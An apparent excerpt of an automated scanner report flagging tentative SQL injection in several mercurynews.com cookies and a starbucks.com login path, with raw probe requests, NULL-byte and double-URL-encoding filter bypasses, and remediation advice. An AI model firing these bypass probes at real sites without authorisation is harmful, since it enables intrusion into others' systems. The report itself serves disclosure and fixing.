GET /warriors/ci_16792619 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/warriors/ci_16792619?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:42:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:42:10 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /warriors/ci_16792619?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserType cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16792619 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%2527; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%2527%2527; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/warriors/ci_16792619?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:41:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:41:43 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 443
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_c cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16792619?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /warriors/ci_16792619?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16792619?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at DallasTipoff: 5:30 p.m., American Airlines CenterTV/Radio: CSNBA; NBA-TV; 1050- ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16794092?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16794092?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16794092?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16794092?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fPage cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16794092?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16794092?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%2527%2527; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='After winning six of their first eight games, the Warriors have found themselves struggling ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /weird-news/ci_16784172 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='ST. CLOUD, Minn -- Two teenage boys from central Minnesota are accused of stealing at least ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /weird-news/ci_16784172 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/weird-news/ci_16784172?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:44:17 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:44:17 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 445
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
1.283. https://www.starbucks.com/account/partneracct/IDMLogin [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
https://www.starbucks.com
Path:
/account/partneracct/IDMLogin
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
